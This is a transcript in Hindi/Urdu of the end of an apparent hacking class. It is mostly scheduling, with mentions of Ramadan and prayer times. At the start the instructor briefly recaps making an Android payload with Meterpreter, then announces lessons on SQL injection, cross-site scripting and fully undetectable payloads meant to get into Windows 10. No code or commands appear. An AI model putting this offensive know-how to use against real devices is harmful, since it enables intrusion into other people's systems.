आपको को बहुत ज्यादा शोर नहीं, तंग नहीं किया। एक मिनट जी, सेम जैसे मैंने इसका बनाया आप उस एक्सटेंशन के साथ बना लें। और जैसे मैंने एंड्रॉइड का लोड किया, आप क्या नाम था उसका, पेलोड, आप फिर iOS का मेटाप्रेटर सेशन लोड कर लें, सेम तरीका है। तो क्या बनाया था हमने, दिस वन। बस ये है कि यहाँ पे -F APK वगैरह करें तो ये एक दो और सॉफ्टवेयर मांग लेता है। आप डायरेक्ट ये आउटपुट इसमें डाल दें, काम चल जाएगा। बाकी आपको और बहुत सारे टूल मिलेंगे जो APK प्रोड्यूस करेंगे। अब जो असल काम पे आ रहा हूँ वो ये है कि अभी तक विंडो 10 नहीं हमारे हाथ आई। विंडो 10 को फिर कैसे पकड़ सकते हैं, उसका तरीका ये आज ख्वाहिश थी, एक तो गला भी नहीं साथ दे रहा कि मजे से हमको सेशन लंबा कर लेते तो आज ही एंड कर देते, क्योंकि मैं आज भी नमाज मिस करके बैठा हुआ हूँ। जमात भी गई, रमजान का पहली तरावियां भी गई। तो मुझे ये बताएं, एक और सेशन हमने रखना है, उसमें मैं आपको SQL इंजेक्शन और क्रॉस साइट स्क्रिप्टिंग का कुछ आइडिया दूंगा। और इससे रिलेटेड एक टॉपिक है जिसको हम बोलते हैं FUD, फुली अनडिटेक्टेबल पेलोड। तो अगला सेशन हम कब रख सकते हैं, ये बताएं, ताकि मैं ये FUD उसी में इंटरेस्टिंगली रख दूं, ये चीज पेंडिंग, ताकि आप फिर छुट्टी ना करें। सर कल रख लें, कल नहीं, मुझे लग रहा है कि मुझे जैसे गला अपसेट है थोड़ा सा, ये टेम्परेचर ही ना हो जाए। कल एक तो रोजा है, फर्स्ट रोजा मैं देना चाह रहा हूँ, वो बताएं। आज अगर मैं इसी गले में पेन ना हो रहा होता तो मैं कुछ घंटा डेढ़ और लगा के मैं आपसे आज माजरत कर लेता कि बस आज हम अल्लाह हाफिज करते हैं, मजे से फिर जरा रमजान को एंजॉय करते हैं। एक सेशन और एक बेहतरीन हो जाए जिसमें मैं तो ये FUD बनाऊंगा। FUD मीन कि जो विंडो 10 में भी घुस जाए, और SQL इंजेक्शन का आपको बताऊंगा, और क्रॉस साइट स्क्रिप्टिंग ये क्या बुला है। सैटरडे ठहरे बच्चे, मुझे स्पेशली वो बच्चे बोले वीकेंड पर कर लें, सैटरडे कर लें, ठीक है सैटरडे कर लें इंशाल्लाह। अब मेरी कुछ थोड़ी सी है जाती जो मसाइल हैं, तो आप लोगों को शायद मैंने बताया था कि मेरी ना वाइफ के ऑपरेशन बार बार डिले हो रहा है, उसके लिए मुझे कोई डेट ना मिल जाए, मिल गई तो फिर मैं ग्रुप पे एक सेशन
मुमकिन है अभी फाइनल कर लेते हैं, उम्मीद है उस पर मैं कोशिश करूंगा, चाहे मैं बिजी भी हुआ एंगेज हो जाऊं। सैटरडे दूसरी क्लास है, चलें अभी डिस्कस करें, अभी करें कि नेक्स्ट सेशन कब करना है। थर्सडे को, एक मिनट मुझे ये बताएं आज क्या है। कल वेडनेसडे हो गया, वेडनेसडे और फ्राइडे। आप बताएं जो बच्चे पढ़ रहे हैं, जो बच्चे पढ़ रहे हैं उनकी क्लास किस टाइम पे होती है? एक मिनट जी, मुझे सिर्फ ये बताएं, जिनकी एनपी की क्लास चल रही है वो उनकी क्लास की टाइमिंग 7 to 8 आप लोगों ने मुझे बताया था, 7 to 8 ऐसे ही है ना? तो इसका मतलब है हम अगर कल नहीं परसों, परसों मीन आज जुमेरात, जुमेरात को मैं 8 बजे आपको टाइम दे दूं तो बताएं, मैं लिख रहा हूं थर्सडे को अगर हम 8 PM रखते हैं तो इसमें किसी को प्रॉब्लम? नहीं, मुझे इस पे सिर्फ किसी को बताएं फैसल भाई। ओके बस ठीक है। नहीं फैसल आप नहीं ले सकते ये थर्सडे वाला सेशन? थर्सडे आप नहीं ले सकते, फ्राइडे ले सकते हैं? फ्राइडे ले सकते हैं आप ये सेशन? यस आपने, मैं फिर क्वेश्चन कह रहा हूँ, फ्राइडे को आप ये सेशन ले सकते हैं? एक मिनट जी, चले आखिर में अब कोई अगर एक दोस्त, ठीक है जी, फाइनली हम कर लेते हैं, किसी एक की भी छुट्टी नहीं होनी चाहिए, बेस्ट है। जहाँ थर्सडे होना है तो वहाँ फ्राइडे भी हो ही जाएगा इंशाल्लाह। फ्राइडे मेरी तरफ से इंशाल्लाह 7 बजे नहीं जी, 7 बजे नहीं, ये सेशन होगा 8। उसकी वजह है कि एनपी चल रही है उनकी 7 to 8। फ्राइडे होगी ना आपकी एनपी की क्लास, पूछ रहा हूँ मैं, एनपी की क्लास फ्राइडे है? एनपी की क्लास फ्राइडे है? नहीं है मींस आपकी जो सिक्योरिटी की है कोई भी क्लास जो बच्चे पढ़ रहे हैं एमपीएलएस या, वो फ्राइडे होती है? तो ठीक है, फिर तो हम इसको 7 to 8 भी कर सकते हैं। उसमें यह है कि ईशा की नमाज भी जमात से नसीब हो जाएगी। बेस्ट हो गया, अच्छा आपने याद करा दिया। हम इसको 7 बजे मीन 6:15 6:30 रोजा खुलता है, और बस 7:15 कर लें इसको, ताकि मैं सुकून से रोजा खोल के इंशाल्लाह फिर आपके साथ एक सेशन हम इसको कर लेंगे। और मेरी कोशिश होगी 8:15 से 5 मिनट पहले, क्योंकि 8:15 पे यहाँ ईशा की नमाज होती है तो मैं जमात नसीब हो जाएगी इंशाल्लाह। तो चलें डन, ये आप लिख लें, मैं खुद भी बल्कि इसका रिमाइंडर बना लूंगा। फ्राइडे एट 7:15 को हम इंशाल्लाह सेशन लेंगे। दुआ में याद रखें। अल्लाह हाफिज, अल्लाह हाफिज, अस्सलाम वालेकुम, खैर मुबारक जी।